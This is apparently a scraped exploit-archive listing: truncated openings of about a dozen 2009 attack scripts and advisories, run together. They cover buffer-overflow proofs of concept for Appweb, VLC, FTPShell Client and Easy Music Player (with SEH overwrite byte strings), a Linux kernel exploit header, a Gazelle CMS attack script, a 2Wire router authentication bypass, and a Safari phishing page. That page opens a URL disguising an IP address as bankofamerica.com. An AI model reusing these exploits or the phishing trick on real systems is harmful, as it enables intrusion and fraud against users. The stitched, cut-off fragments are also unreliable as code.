#!/usr/bin/python############################################################################# # EmbedThis Appweb v3.0B.2-4 Multiple Remote Buffer Overflow PoCs# Found By: Dr_IDE# Based On: http://www.milw0rm.com/exploits/9411# Tested On: XP SP2# No
------------------------------------exploit.c------------------------- /* * 14.08.2009, babcia padlina * * vulnerability discovered by google security team * * some parts of exploit code borrowed from vmsplice exploit by qaaz * per_svr4 mmap zero te
----------------------------exploit.c--------------------------------- /* dedicated to my best friend in the whole world, Robin Price the joke is in your hands just too easy -- some nice library functions for reuse here though credits to julien tinn
html head titleHijacking Safari 4 Top Sites with Phish Bombs/title /head body div align=centerh1Hijacking Safari 4 Top Sites with Phish Bombs/h1 h2By Inferno/h2 a href=javascript: { w1=window.open('http://www.bankofamerica.com@174.120.41.176/~inferno
#!/bin/bash# Gazelle CMS 1.0 Multiple Vulnerabilities# Script Download: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download# Found by white_sheep on 11/08/2009# Contact: sheewhite@googlemail.com - https://www.ihteam.net# Need magic_quote_gpc
#!/usr/bin/python ############################################################################ # # EmbedThis Appweb v3.0B.2-4 Multiple Remote Buffer Overflow PoCs # Found By: Dr_IDE # Based On: http://www.milw0rm.com/exploits/9411 # Tested On: XP SP2
#!/usr/bin/env python ############################################################################ # # VLC Media Player 1.0.01.0.1 smb:// URI Handling Remote Stack Overflow PoC # Found By:Dr_IDE # Tested:Windows XP SP2 , XP SP3 and Windows 7 RC1 # T
/* * FTPShell Client, Name Session Stack Overflow Exploit * Tested on Version 4.1 RC2 on Windows XP SP3 * Vulnerable program download page : http://www.ftpshell.com/downloadclient.htm * Coded by zec * Feel yourself freely to get into touch : zec@bsdm
2WIRE GATEWAY AUTHENTICATION BYPASS PASSWORD RESET (08/04/09) ============================================================== DESCRIPTION ----------------- There is an authentication bypass vulnerability in page=CD35_SETUP_01 that allows you to set a
#!/usr/bin/perl #Microsoft Wordpad on WinXP SP3 Memory Exhaustion Vulnerability - 0day #Works on WinXP SP3! #bug found by murderkey in Hellcode Labs. #exploit coded by karak0rsan aka musashi #Hellcode Resarch #just a fuckin' lame 0day bug for fun! $
#!/usr/bin/perl # by hack4love # hack4love@hotmail.com # first http://www.milw0rm.com/exploits/9412 # Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH) # http://www.otbcode.com/downloads/easymusicsetup.exe #########################
#!/usr/bin/perl # by ThE g0bL!N #Big thnx: His0k4 #easy Music Player 1.0.0.2(wav) local Buffer Overflow Exploit (SEH) ################################################################## my $bof=x41 x 4132; my $nsh=xEBx06x90x90; my $seh=xB8x15x
#!/usr/bin/perl # by ahwak2000 # email: 0.w[at]w.cn # Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH) # http://www.otbcode.com/downloads/easymusicsetup.exe ################################################################### my $s